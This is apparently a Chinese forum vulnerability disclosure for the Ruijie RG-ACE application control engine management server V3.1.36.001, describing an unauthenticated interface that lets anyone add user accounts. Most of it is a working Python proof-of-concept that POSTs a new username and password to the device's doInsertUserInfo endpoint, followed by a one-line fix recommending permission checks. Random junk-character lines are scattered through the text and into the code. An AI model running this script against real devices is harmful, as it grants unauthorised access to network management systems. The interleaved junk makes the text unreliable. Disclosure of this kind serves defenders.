锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

! `# \) q+ a, [- h( _2 W
# V( Y) j, J9 L) P测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
2 C- D5 U. F' m* P编译时间: 201104291730
7 q: {) r; H2 v8 q- ]1 z$ {: `
4 w, q1 h  K/ V. S" k
漏洞证明：
2 A3 }* M& }+ k7 V/ \5 A
7 n$ r1 X8 b/ U0 v6 e' b( P$ b  Z
* _1 C7 ?! G7 u7 b" Y' j
0 r# c4 b0 S: e, t$ z
9 `* r4 \3 h; m7 ]: x
+ f9 g$ j; L- L: U. L9 m0 _
4 F  f' T" e$ A4 N执行脚本
+ M) J6 f+ f$ y6 h5 E- N) m; o! l, s#! /usr/bin/env python
( J# @2 Q- l8 E! N1 d#coding=gbk
  C( ~$ k! @7 a& C% g8 L1 ]#RG-ACE管理服务器 V3.1.36.001
1 N) ^) m, d2 ?% p# Q% S8 timport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
# [% S& @& S% B/ L' @post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
. @! m; w1 D: g( i# I$ z( m("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
$ \- b' i  f, J* e0 e* y4 u4 B("officePhone",""),
' Q% P5 P# t. Y. Z7 V! k' w("addr",""),
/ w0 A) r; y+ d' o$ S' p("submit","确定"))
urllib2.install_opener(opener)
% O1 ~! e- Y7 U. C5 t0 ?) k/ pp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
" Z& ]/ k' G5 W1 f, Z
! K: t. K/ c' w/ h  t$ d登录，连接设备
  G9 ^6 @' I4 V( Q/ G$ T/ Z( O* S% }


1 u' l+ t! r1 d- K. D. z
% }, T7 F8 Y0 z3 O
默认的管理员admin权限更大点
. @$ T: X6 M- W9 I
  t! r* H% {; c5 X( a' Y) M5 E; Z9 ?4 w

# j2 A' ?; b1 _1 L/ T

8 d- s0 c' e$ ]1 e! M% T6 I修复方案：
加强对接口的权限验证
  p' X% G; t9 G& U. p( N4 y
/ c! l& f! N( x3 P% x2 u8 X